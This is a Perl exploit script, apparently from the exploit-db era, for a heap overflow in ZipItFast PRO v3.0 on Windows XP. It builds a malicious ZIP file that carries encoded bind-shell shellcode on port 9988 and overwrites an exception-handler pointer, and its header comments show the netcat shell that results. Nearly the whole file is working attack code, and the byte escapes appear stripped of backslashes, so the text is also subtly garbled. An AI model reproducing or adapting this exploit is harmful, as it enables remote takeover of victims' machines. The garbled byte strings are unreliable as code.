#!/usr/bin/perl

#---------------------------------------------------------------------------#
# Exploit: ZipItFast PRO v3.0 Heap-Overflow                                 #
# Author: b33f - http://www.fuzzysecurity.com/                              #
# OS: Windows XP SP1                                                        #
# DOS POC: C4SS!0 G0M3S => http://www.exploit-db.com/exploits/17512/        #
# Software: http://www.exploit-db.com/wp-content/themes/exploit/            #
#           applications/decbc54ffcf644e780a3ef4fcdd27093-zipitfastnow.exe  #
#---------------------------------------------------------------------------#
# Sorry for reinventing the wheel but learning about heap-overflows         #
# requires you to take a step back and roll with the punches not unlike     #
# watching a David Lynch production ;))...                                  #
#                                                                           #
# - "Who is that lady with the log?"                                        #
# + "We call her the log-lady.."                                            #
#---------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.131 9988                                    #
# (UNKNOWN) [192.168.111.131] 9988 (?) open                                 #
# Microsoft Windows XP [Version 5.1.2600]                                   #
# (C) Copyright 1985-2001 Microsoft Corp.                                   #
#                                                                           #
# C:Documents and SettingsOwnerDesktop>                                  #
#---------------------------------------------------------------------------#

use strict;
use warnings;
 
my $filename = "Exploit.zip";

my $head = 
"x50x4Bx03x04x14x00x00".
"x00x00x00xB7xACxCEx34x00x00x00".
"x00x00x00x00x00x00x00x00".
"xe4x0f".
"x00x00x00";
 
my $head2 = 
"x50x4Bx01x02x14x00x14".
"x00x00x00x00x00xB7xACxCEx34x00x00x00".
"x00x00x00x00x00x00x00x00x00".
"xe4x0f".
"x00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";
 
my $head3 = 
"x50x4Bx05x06x00x00x00".
"x00x01x00x01x00".
"x12x10x00x00".
"x02x10x00x00".
"x00x00";

# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t
# [*] x86/alpha_mixed succeeded with size 744 (iteration=1)
my $ph33r = 
"x89xe2xdaxd5xd9x72xf4x58x50x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x39x6cx39x78x4cx49x55x50x47x70" .
"x55x50x35x30x6fx79x59x75x54x71x78x52x52x44" .
"x6ex6bx42x72x44x70x6ex6bx30x52x56x6cx4ex6b" .
"x30x52x35x44x4ex6bx52x52x77x58x56x6fx68x37" .
"x61x5ax46x46x64x71x79x6fx74x71x6fx30x6cx6c" .
"x75x6cx65x31x33x4cx56x62x34x6cx31x30x6fx31" .
"x4ax6fx64x4dx73x31x6ax67x6dx32x4cx30x70x52" .
"x56x37x4ex6bx50x52x76x70x6cx4bx61x52x77x4c" .
"x73x31x6ax70x4cx4bx37x30x52x58x6fx75x79x50" .
"x72x54x73x7ax45x51x4ax70x42x70x4cx4bx32x68" .
"x65x48x6cx4bx63x68x65x70x76x61x39x43x6bx53" .
"x65x6cx77x39x4ex6bx76x54x4cx4bx76x61x48x56" .
"x76x51x49x6fx55x61x79x50x6ex4cx6fx31x58x4f" .
"x56x6dx45x51x38x47x66x58x69x70x42x55x6ax54" .
"x74x43x53x4dx5ax58x77x4bx73x4dx64x64x33x45" .
"x48x62x73x68x6ex6bx61x48x76x44x76x61x6ax73" .
"x50x66x6ex6bx46x6cx62x6bx6cx4bx36x38x35x4c" .
"x56x61x4bx63x6cx4bx43x34x6ex6bx33x31x7ax70" .
"x6ex69x62x64x34x64x56x44x33x6bx63x6bx50x61" .
"x31x49x73x6ax72x71x79x6fx59x70x32x78x33x6f" .
"x32x7ax4ex6bx56x72x68x6bx6bx36x43x6dx71x78" .
"x47x43x55x62x47x70x67x70x71x78x53x47x42x53" .
"x50x32x31x4fx46x34x53x58x70x4cx30x77x76x46" .
"x47x77x6bx4fx38x55x6fx48x6ex70x37x71x77x70" .
"x77x70x65x79x6fx34x42x74x76x30x75x38x46x49" .
"x6bx30x30x6bx53x30x79x6fx4ex35x30x50x62x70" .
"x62x70x52x70x33x70x42x70x51x50x42x70x72x48" .
"x68x6ax74x4fx39x4fx79x70x69x6fx4ex35x6ex69" .
"x6fx37x34x71x4bx6bx76x33x63x58x66x62x65x50" .
"x35x77x55x54x6ex69x4ax46x51x7ax56x70x33x66" .
"x66x37x51x78x6fx32x39x4bx77x47x55x37x6bx4f" .
"x4bx65x66x33x31x47x50x68x4dx67x48x69x75x68" .
"x4bx4fx49x6fx4ex35x32x73x62x73x62x77x32x48" .
"x43x44x68x6cx45x6bx6dx31x6bx4fx4ex35x42x77" .
"x6fx79x78x47x52x48x62x55x70x6ex30x4dx75x31" .
"x6bx4fx59x45x53x58x50x63x62x4dx32x44x73x30" .
"x4fx79x79x73x63x67x56x37x73x67x35x61x39x66" .
"x51x7ax66x72x36x39x61x46x58x62x6bx4dx63x56" .
"x39x57x70x44x34x64x37x4cx53x31x57x71x4ex6d" .
"x70x44x66x44x74x50x7ax66x75x50x42x64x62x74" .
"x36x30x71x46x42x76x30x56x72x66x30x56x30x4e" .
"x70x56x76x36x73x63x53x66x33x58x72x59x38x4c" .
"x47x4fx4cx46x59x6fx4ax75x6fx79x59x70x50x4e" .
"x53x66x71x56x59x6fx56x50x75x38x34x48x6fx77" .
"x37x6dx63x50x59x6fx79x45x4fx4bx48x70x6cx75" .
"x4cx62x31x46x45x38x6fx56x5ax35x4dx6dx6fx6d" .
"x79x6fx5ax75x55x6cx37x76x53x4cx45x5ax4fx70" .
"x79x6bx4dx30x43x45x73x35x4dx6bx63x77x77x63" .
"x70x72x50x6fx70x6ax77x70x61x43x59x6fx79x45" .
"x41x41";

my $buf1 = "A" x 4064 . ".txt";

#################
# EAX => 256-bytes => 0x77fc3210 - 0x04 => 0x77fc320c (_VECTORED_EXCEPTION_NODE)
# EDX => 260-bytes => 0x0012FA28 - 0x08 => 0x0012FA20 (PTR shellcode)
# Jump over Blink and Flink => EB 0A
#################
my $magic = "xEBx0A" . "x0Cx32xFCx77" . "x20xFAx12x00";

##################
# Notice that the offsets don't correspond exactly. I experienced some buffer
# expansion and compression depending on the buffer structure so keep that in
# mind if you want to do some testing.
#
# Remember to set Anti-Debugging flags in your debugger..
# (immunity = > !hidedebug All_Debug)
##################
my $buf2 = "x90" x 253 . $magic . "A" x 300 . $ph33r . "A" x 2756 . ".txt";

my $zip = $head.$buf1.$head2.$buf2.$head3;
open(FILE,">$filename") || die "[-]Error:n$!n";
print FILE $zip;
close(FILE);